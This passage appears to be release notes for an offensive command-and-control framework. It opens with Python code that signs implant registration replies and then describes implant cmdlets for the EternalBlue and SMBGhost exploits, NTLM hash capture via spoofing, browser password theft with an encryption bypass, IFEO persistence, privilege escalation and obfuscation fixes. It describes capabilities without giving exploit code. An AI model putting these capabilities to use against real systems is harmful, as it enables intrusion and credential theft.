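        from cryptography.hazmat.primitives.asymmetric import padding, rsa
        key = rsa.generate_private_key(65537, 2048)

        def sign(m):
            return key.sign(m, padding.PKCS1v15(), hashes.SHA256())

        def verify(m, s):
            try:
                key.public_key().verify(s, m, padding.PKCS1v15(), hashes.SHA256())
                return True
            except InvalidSignature:
                return False
        return sign, verify
    except ImportError:
        secret = b"stand-in-key-not-rsa"  # only so the example runs without the package

        def sign(m):
            return hmac.new(secret, m, "sha256").digest()

        def verify(m, s):
            return hmac.compare_digest(sign(m), s)
        return sign, verify


SIGN, VERIFY = make_signer()


def register(peer_ip: str, build_id: str, host: str = "ws01", sessions=None):
    """Client encodes Register, server dispatches it, client decodes and verifies the signed reply."""
    sessions = {} if sessions is None else sessions
    cmd, body = decode_request(encode_request("Register", f"{build_id}|{host}".encode()))
    assert cmd == CMD["Register"]
    status, reply = dispatch_register(body, peer_ip, sessions)
    return decode_response(encode_response(status, reply, SIGN), VERIFY)


def tamper_detected() -> bool:
    """Flip Error -> OK on the wire; the signature over header+body must catch it."""
    wire = bytearray(encode_response(STATUS_ERROR, GENERIC_DENIAL, SIGN))
    wire[0] = STATUS_OK
    try:
        decode_response(bytes(wire), VERIFY)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(register("127.0.0.1", "default"), register("10.0.0.5", "default"), tamper_detected())
```

Signing the header together with the body is the design choice worth noting: if only the body were signed, a man-in-the-middle could turn an Error into an OK without invalidating the signature.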

New Cmdlets

Reach Module Cmdlets (Implant-Side)

  • Get-SupportedExploits — returns a list of all exploitation techniques registered in the Reach module with their CVE identifiers and target platform descriptions
  • Invoke-Reach — runs a selected Reach exploitation technique against a remote target; -Technique selects the CVE entry; technique-specific parameters (target IP, port, payload bytes) are passed as additional arguments; returns a result object with CheckPassed and ExploitSucceeded flags
  • Invoke-ReachRunCommand — convenience cmdlet that delivers a shell command to a remote target via a Reach technique; wraps Invoke-Reach with a command execution payload

Inveigh Module Cmdlets (Implant-Side)

  • Start-InveighListener — starts one or more Inveigh protocol listeners; parameters include -Listener to select protocols (HTTP, HTTPS, Proxy, SMB, LDAP), -Challenge to set a fixed NTLM challenge value, and authentication configuration options
  • Start-InveighSpoofer — starts one or more name resolution spoofers; parameters include -Spoofer to select protocols (LLMNR, MDNS, NBNS, DNS, DHCPv6), -IP to specify the spoofed response IP, and per-protocol target and filter lists
  • Get-InveighCredential — retrieves captured NTLM challenge-response hashes and cleartext credentials; supports -Hashcat for hashcat-compatible output format and -Unique to deduplicate by username
  • Wait-InveighCredential — blocks until the specified number of credentials have been captured or the timeout expires; -Count sets the target credential count, -Timeout in seconds controls the maximum wait time
  • Get-InveighStatus — returns a status object describing all active listeners and spoofers, their bound ports, and running packet and capture counts
  • Stop-Inveigh — stops all Inveigh listeners and spoofers and releases all bound sockets; safe to call when no session is running
  • Clear-Inveigh — clears the captured credential store and resets all packet counters; does not stop active listeners

SMB Module Cmdlets (Implant-Side)

  • Invoke-EternalBlue — exploits CVE-2017-0144 against unpatched Windows 7 and Windows Server 2008 R2 targets reachable over SMB; delivers shellcode to the SMB service for SYSTEM execution
  • Invoke-SmbGhost — exploits the SMBv3 compression overflow against unpatched Windows 10 1903/1909 targets; delivers shellcode to the kernel-mode SMB driver

Credentials Module Cmdlets (Implant-Side)

  • Get-BrowserCredentials — extracts saved credentials from Chrome, Edge, Brave, and Firefox; handles Chrome 127+ App-Bound Encryption via the IElevator COM bypass; runs from SYSTEM by iterating user profiles; returns structured credential objects with URL, username, and plaintext password

LevelUp Module Cmdlet (Implant-Side)

  • Invoke-LevelUpRunCommand — runs a LevelUp privilege escalation technique by name; accepts -Technique to identify the CVE entry and -Arguments as a hashtable passed through to the technique factory; returns a result object with CheckPassed, ExecuteSucceeded, and output fields

Persistence Module Cmdlet (Implant-Side)

  • Set-IfeoHijackPersistence — installs persistence via Image File Execution Options hijack; generates a payload (PowerShell cradle, Zig EXE, Zig staged loader, or C# EXE), drops it to disk, and writes it as the IFEO debugger value for a specified target executable under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options; executes as SYSTEM whenever the target executable is launched

Recon Module Cmdlet (Implant-Side)

  • Get-RecentFiles — enumerates recently accessed files for all user profiles on the system; reads the Windows Recent Items shell folders and returns file paths, access timestamps, and associated user accounts; useful for identifying documents and credentials accessed before the implant was deployed

Server-Side PSCmdlets

  • Compile-Zig — invokes the bundled Zig 0.16.0 compiler against a Zig source string or StringTransformResult; parameters: -OS, -Architecture, -Optimization, -OutputType; returns byte[]
  • Specter-SessionsWait — blocks until a new implant session checks in; optional -IP and -Username filters narrow which session triggers the return; uses SignalR event notifications with no polling; excludes sessions that existed before the cmdlet started; returns the session object when a matching session arrives
  • Specter-AiMessagesGrep — searches the body of AI message records using regex; supports case-insensitive matching, line number output, context lines before and after each match, and invert-match; callable with a MessageId to search a single message or a SessionId to search all messages in an AI session
  • Specter-DocumentationSearch — executes a semantic search over indexed documentation using vector embeddings; accepts a natural-language query and returns the top-K most relevant chunks ranked by cosine similarity; falls back to substring search when no embedding provider is available
  • Specter-NotebooksCreate — creates a new notebook with an initial set of cells; accepts notebook name, description, and a cell array; returns the created notebook object with its assigned ID
  • Specter-NotebooksGet — retrieves a single notebook by ID; returns the notebook object including all cells and metadata
  • Specter-NotebooksList — returns all notebooks stored on the server; supports optional keyword filtering
  • Specter-NotebooksUpdate — updates a notebook’s metadata or cell array by ID; replaces the cell list in full if cells are provided
  • Specter-NotebooksDelete — deletes a notebook by ID; non-reversible
  • Specter-NotebooksRunCell — executes a single script cell from a notebook against the notebook’s persistent session; accepts the notebook ID and cell index; returns a result object with output streams, error flag, and execution duration; timeout is configurable
  • Specter-NotebooksResetSession — tears down and recreates the server-side PowerShell session for the specified notebook; clears all session state including variables, loaded modules, and runspace history

User Interface Updates

  • Documentation System — a new integrated documentation viewer lets operators browse module documentation, technique write-ups, and CVE implementation guides without leaving the application. The documentation system includes a home view, searchable index, and per-document reader (DocumentationHomeControl, DocumentationIndexControl, DocumentationControl). Documentation search invokes the server-side RAG system and surfaces ranked results inline.
  • Pipeline Quick-Run — a new quick-run panel (PayloadPipelineQuickRunControl) allows operators to execute a payload pipeline directly from the session workspace without navigating to the payload builder. Useful for rapid iteration during engagements.
  • File Explorer — FileExplorerControl renders a tree view of files collected from sessions (FileTreeNodeViewModel). Files are indexed against the network intelligence database and linked to the host they were retrieved from.
  • Event Visualization — event log entries in the session workspace are now color-coded by outcome and type. EventOutcomeColorConverter and EventTypeColorConverter map event metadata to colors. EventTypeCategoryViewModel and EventTypeSelectorViewModel support event type filtering in the log view.
  • Session Notes — SessionNotesViewModel now includes additional metadata fields for tracking engagement-specific context per session.
  • Dock Additions — CommandBuilder, FileExplorer, ScriptSearcher, and CommandHistory panels are available as dockable windows in the session workspace. Each can be docked, floating, or closed independently.

Bug Fixes

RunPE: Invoke-InMemoryPE -Capture No Longer Kills the Implant Process

Using -Capture with Invoke-InMemoryPE previously terminated the implant process. The root cause was the thread parking mechanism used to keep the loader thread alive after handing control to the loaded PE. The interim implementation used Thread.Sleep(Infinite), which is interruptible: the CLR’s Thread.Abort() and Thread.Interrupt() can wake it, and the resulting managed exception propagates into native PE frames where there is no handler, triggering an unhandled SEH fault that takes down the process.

The fix replaces Thread.Sleep with WaitForSingleObject on a static, never-signaled Win32 event (_hParkEvent). The thread enters native (preemptive) mode and becomes immune to Thread.Abort() injection and Thread.Interrupt() wakeups. The GC cannot pause it at collection boundaries either.

Additional changes shipped with this fix:

  • CRT exit hooks — ExitHooks now intercepts exit, _exit, _cexit, abort, and quick_exit to catch PE termination via CRT paths, preventing the CRT from tearing down the process when the loaded binary exits normally.
  • IAT-based stdout/stderr capture — StdHandleHooks patches GetStdHandle in the loaded PE’s Import Address Table. The previous approach called SetStdHandle before loading the PE, which was ineffective for binaries that cache the handle at startup. IAT patching ensures the redirect is applied regardless of when the PE calls GetStdHandle.
  • RunPEContext — a ManualResetEvent (_exitEvent) tracks PE completion, replacing a polling approach for callers that wait on output.

PowerShell String Obfuscation Reliability

Three PowerShell string obfuscation transformers were producing invalid output for certain input patterns. Each had encoding or boundary errors in their output assembly logic:

  • PwshStringEscapeTransformer: off-by-one in escape sequence boundary handling
  • PwshStringReverseTransformer: encoding error when reversing strings containing multi-byte sequences
  • PwshStringShuffleTransformer: output assembly error in recombination step

All three are fixed. Regression tests for the failing input patterns have been added to the obfuscation test suite.